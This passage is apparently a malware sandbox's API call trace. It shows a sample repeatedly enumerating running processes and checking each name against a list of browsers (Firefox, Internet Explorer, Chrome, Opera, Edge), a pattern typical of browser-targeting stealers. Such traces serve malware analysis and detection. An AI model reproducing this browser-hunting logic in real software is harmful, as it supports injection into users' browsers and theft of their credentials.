lpString2="iexplore.exe") returned 1 [0189.593] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.593] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.593] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.593] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0189.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0189.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0189.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0189.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0189.594] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.594] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.594] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.594] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.594] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.594] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.594] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0189.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0189.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0189.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0189.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0189.595] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.595] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0189.596] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0189.596] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0189.596] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0189.596] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0189.596] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.596] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.596] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.596] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.596] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.596] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0189.596] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.596] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0189.597] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0189.597] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0189.597] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0189.597] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0189.597] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.597] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0189.597] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0189.597] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0189.597] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0189.597] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0189.597] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0189.597] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.598] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.598] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.598] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.598] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0189.598] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.598] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.598] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.598] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.599] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0189.599] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.599] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0189.600] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0189.600] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0189.600] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0189.600] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0189.600] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0189.600] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0189.600] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0189.600] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0189.600] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0189.600] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0189.600] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0189.600] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0189.601] CloseHandle (hObject=0xe8) returned 1 [0189.601] Sleep (dwMilliseconds=0x3e8) [0190.656] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0190.658] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.659] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0190.659] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0190.659] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0190.659] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0190.659] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0190.659] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.659] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0190.659] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0190.659] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0190.659] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0190.659] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0190.660] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.660] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0190.660] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0190.660] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0190.660] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0190.660] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.660] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.661] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0190.661] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0190.661] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0190.661] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0190.661] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.661] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.661] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0190.661] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0190.661] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0190.661] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0190.661] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.661] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.662] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0190.662] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0190.662] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0190.662] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0190.662] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.662] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.662] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0190.662] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0190.662] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0190.662] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0190.663] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.663] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.663] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0190.663] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0190.663] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0190.663] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0190.663] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.663] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.664] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0190.664] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0190.664] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0190.664] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0190.664] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.664] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0190.664] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0190.664] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0190.664] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0190.664] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0190.664] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.664] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.665] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.665] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.666] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.666] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.666] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.666] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.666] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.666] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.666] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.667] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.667] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.667] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.668] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0190.668] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0190.668] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0190.668] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0190.668] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.668] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.668] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.668] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.668] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.668] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.668] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.668] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.669] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.669] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.669] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.669] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.669] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.669] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.670] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0190.670] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0190.670] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0190.670] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0190.670] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.670] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.670] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0190.670] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0190.670] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0190.670] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0190.670] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.670] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0190.671] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0190.671] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0190.671] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0190.671] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0190.671] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.671] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.671] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0190.671] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0190.671] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0190.671] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0190.671] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.671] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0190.672] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0190.672] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0190.672] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0190.672] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0190.672] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0190.672] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0190.673] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0190.673] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0190.673] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0190.673] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0190.673] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0190.673] Process32Next (in: hSnapshot=0xe8, 